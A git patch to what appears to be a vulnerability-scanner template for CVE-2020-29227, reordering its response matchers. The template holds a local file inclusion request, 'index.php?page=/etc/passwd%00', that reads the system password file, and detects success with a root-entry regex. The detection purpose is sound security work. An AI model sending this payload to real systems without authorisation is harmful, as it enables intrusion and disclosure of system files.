From 3567667123c877ac39b9b979dc7135152fc96afe Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 May 2022 12:12:26 +0530 Subject: [PATCH] Update CVE-2020-29227.yaml --- cves/2020/CVE-2020-29227.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 3955d43f9e..aa29ad55a6 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -18,12 +18,14 @@ requests: - method: GET path: - "{{BaseURL}}/index.php?page=/etc/passwd%00" + matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200